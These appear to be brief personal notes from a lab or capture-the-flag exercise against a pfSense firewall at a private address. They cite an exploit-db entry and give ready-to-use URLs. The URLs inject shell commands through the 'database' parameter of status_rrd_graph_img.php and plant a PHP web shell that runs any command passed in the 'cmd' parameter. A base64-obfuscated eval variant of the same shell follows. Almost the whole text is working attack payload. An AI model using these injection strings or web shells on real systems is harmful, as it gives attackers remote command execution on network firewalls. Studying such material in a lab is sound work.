Pfsense
- https://www.exploit-db.com/exploits/43560
https://10.10.10.60/status_rrd_graph_img.php?database=queues;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd usr;cd local; cd www;echo 'test' > abcd.txt
https://10.10.10.60/status_rrd_graph_img.php?database=queues;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd usr;cd local; cd www;echo '<?php echo system($_GET["cmd"]); ?>' > abcd.php
Can also do:
php eval(base64_decode('ZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsg'));?>
echo system($_GET['cmd']);